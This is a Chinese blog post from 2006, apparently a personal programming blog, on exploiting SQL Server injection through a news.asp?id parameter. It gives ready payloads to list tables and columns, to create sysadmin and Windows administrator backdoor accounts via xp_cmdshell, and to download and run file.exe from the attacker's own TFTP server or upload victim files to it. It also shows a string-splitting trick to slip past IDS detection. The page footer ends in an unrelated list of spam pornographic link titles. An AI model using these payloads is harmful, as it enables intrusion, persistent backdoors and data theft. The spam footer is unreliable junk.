<rt id="bn8ez"></rt>
<label id="bn8ez"></label>
  • 

    • <span id="bn8ez"></span>
    

    <label id="bn8ez"><meter id="bn8ez"></meter></label>
    

    
    

    




    







												


        


    

    
	
	



	

    

    


    
	
		
    
			


    
posts - 23,comments - 12,trackbacks - 0


    
	

    


    
	
					


    
	
	
    


    


    


    


    [獲得數據表名][將字段值更新為表名,再想法讀出這個字段的值就可得到表名]
    update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'你得到的表名' 查出一個加一個]) [ where 條件] 


    [獲得數據表字段名][將字段值更新為字段名,再想法讀出這個字段的值就可得到字段名]
    update 表名 set 字段=(select top 1 col_name(object_id('要查詢的數據表名'),字段列如:1) [ where 條件]
    


    也可以這樣更簡捷的獲取表名:
    


    select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',…)
    

    

    通過SQLSERVER注入漏洞建數據庫管理員帳號和系統管理員帳號[當前帳號必須是SYSADMIN組]
    


    news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //添加數據庫用戶用戶test,密碼為test
    news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //如果想改密碼,則用這句(將test的密碼改為123456)
    news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //將test加到sysadmin組,這個組的成員可執行任何操作
    news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //添加系統用戶test,密碼為test
    news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //將系統用戶test提升為管理員
    


    這樣,你在他的數據庫和系統內都留下了test管理員賬號了
    

    

    下面是如何從你的服器下載文件file.exe后運行它[前提是你必須將你的電腦設為TFTP服務器,將69端口打開]
    


    id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP get file.exe';--
    


    然后運行這個文件:
    id=2; exec master.dbo.xp_cmdshell 'file.exe';--
    


    下載服務器的文件file2.doc到本地TFTP服務器[文件必須存在]:
    


    id=2; exec master.dbo.xp_cmdshell 'tftp –i 你的IP Put file2.doc';--
    


    繞過IDS的檢測[使用變量]
    declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
    declare @a sysname set @a='xp'+'_cm’+’dshell' exec @a 'dir c:\'
    

    
	
    posted on 2006-02-05 10:04 my java 閱讀(290) 評論(0)  編輯  收藏  所屬分類: sql server 
    

    







    
	    
    




    





    


    

	
    
		
    
				
		
	
		
    
		
		
    只有注冊用戶登錄后才能發表評論。
    
		
    
			
		
    
			
		
    
		
		
    
		


    

		    		
		
    
		
    			
		
		
		
		
    
		
    
		
		
    
		
    
			網站導航:
		
		
    
		
    
			


		
    	
		
    
			 
		
    
		
    
			
		
    
		
    
			
				
		
    		
	
    	

    



    

				

    



    







    
        
	



主站蜘蛛池模板:
成人特级毛片69免费观看|
亚洲一日韩欧美中文字幕在线|
japanese色国产在线看免费|
四虎永久在线精品免费观看地址
|
亚洲中文字幕无码久久2017|
一二三四在线观看免费中文在线观看|
国产成人涩涩涩视频在线观看免费
|
国产亚洲高清不卡在线观看|
中国一级毛片视频免费看|
亚洲人成伊人成综合网久久久|
二个人看的www免费视频|
亚洲AV色香蕉一区二区|
国产精品视频免费|
亚洲av色香蕉一区二区三区蜜桃|
国产乱人免费视频|
你懂的免费在线观看|
亚洲性猛交xx乱|
真实乱视频国产免费观看|
香蕉97碰碰视频免费|
亚洲伊人久久精品影院|
99re在线视频免费观看|
中文字幕亚洲精品无码|
亚洲成a人片在线播放|
久久国产免费观看精品|
亚洲免费观看网站|
国产99视频免费精品是看6|
aaa毛片免费观看|
亚洲一区二区三区在线网站
|
伊人免费在线观看高清版|
亚洲理论片在线中文字幕|
日本v片免费一区二区三区|
97超高清在线观看免费视频|
亚洲小说区图片区|
国产yw855.c免费视频|
99热在线精品免费播放6|
久久亚洲AV成人无码国产最大|
亚洲精品乱码久久久久久中文字幕|
69精品免费视频|
牛牛在线精品免费视频观看|
久久久亚洲AV波多野结衣|
免费在线观看理论片|